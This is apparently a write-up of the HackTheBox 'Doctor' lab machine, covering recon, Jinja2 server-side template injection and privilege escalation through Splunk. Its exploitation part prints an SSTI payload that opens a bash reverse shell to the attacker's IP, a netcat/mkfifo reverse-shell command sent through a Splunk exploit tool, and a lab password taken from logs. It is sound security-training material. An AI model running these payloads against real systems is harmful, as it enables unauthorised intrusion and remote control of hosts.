Doctor
An easy Linux box from HackTheBox, get initial access via SSTI, then escalate privileges by finding a password in logfiles and using it to login to Splunk and upload a malicious app.
Recon
Running the usual nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.209
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
See two web servers, one on 80 and one on 8089
Going to 8089 first, see a splunked version 8.0.5, for which searchsploit returns nothing
Moving to port 80, see a regular default templated site, but upon inspection find a domain name, doctors.htb, at the end of a contact email
When going to doctors.htb, get redirected to a login page with which we can register and then login
After logging in, can post messages to a board and change our email and usernames
Since this is a CTF box and not a bug bounty, ignore any possible XXS and just go for SSTI, using the list from HackTricks
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Testing each one of these on every input, creating new messages with every one, don’t find anything
Instead, opt to run a little gobuster on this new domain with the session cookie
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 40 --url http://doctors.htb -c "Cookie: session=.eJwljjtuAzEMBe-i2oX4EylfZiGJJBIYSIBduzJ89whIN2-Kh3mXI8-4vsr9eb7iVo5vL_fS6rIxOgixNfDpSTY7YVCS8GYw0irJmAxEI4Etqi9BqmKJThBBTXpjIXVGqKDogMg9AidHcgtzcWimPiFUFzl7heWwtOyQ1xXnfw3uua4zj-fvI362GDB60IwAneBu-5An61IdiCKcqcNmtvL5Ax4GPoE.YyvRFw.2f9XRRR7z63FVSXirIM0gc9O_PI"
/home (Status: 302) [Size: 245] [--> http://doctors.htb/login?next=%2Fhome]
/archive (Status: 200) [Size: 101]
/account (Status: 302) [Size: 251] [--> http://doctors.htb/login?next=%2Faccount]
/logout (Status: 302) [Size: 217] [--> http://doctors.htb/home]
/login (Status: 200) [Size: 4204]
/register (Status: 200) [Size: 4493]
And find an interesting endpoint “/archive”, navigating to it, find something interesting in the source, the SSTI payload {{7*7}} triggered!
Now enumerating what templater it is, use the graphic from HackTricks to figure out that it is either Jinja2 or Twig
Exploitation
Following the guide from here, further enumerate the SSTI with
{{7*'7'}}
Which should result in 7777777, and it does - so we know its Jinja2 for sure
Now, can use the SSTI to get a reverse shell - set up the listener then create a post with this as the title and body, then go to /archive to execute it and catch the shell
{{ cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"').read() }}
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.209] 46296
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ whoami
web
web@doctor:~$
Running linpeas, find a really interesting possible privesc, python3 with the cap_sys_ptrace capability
Files with capabilities (limited to 50):
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_sys_ptrace+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
But after spending a little too much time in this rabbit hole, move on and see that there is literally plaintext creds in a log file
Since the web user is a member of the “adm” group, have access to logs
web@doctor:/tmp$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
Looking into the /var/log/ directory, see an unusual file called “backup” in the /var/logs/apache2/ directory
Printing it, see a plaintext password, Guitar123
web@doctor:/var/log/apache2$ cat backup
...
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
...
Which is kinda weird, since its in the email field but whatever
Trying to log into splunk, now get in as shaun:Guitar123
Now googling around for splunk exploits, find a prviesc
The exploit revolves around uploading a malicious app to splunk, then executing it - not necessarily a vuln, just how splunk works
Start a listener on 9999, then run the remote version of the exploit from the kali machine since we have shauns creds
python2 SplunkWhisperer2/PySplunkWhisperer2/PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost 10.10.14.5 --lport 14444 --username shaun --password Guitar123 --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9999 >/tmp/f"
Catch the shell, and get root!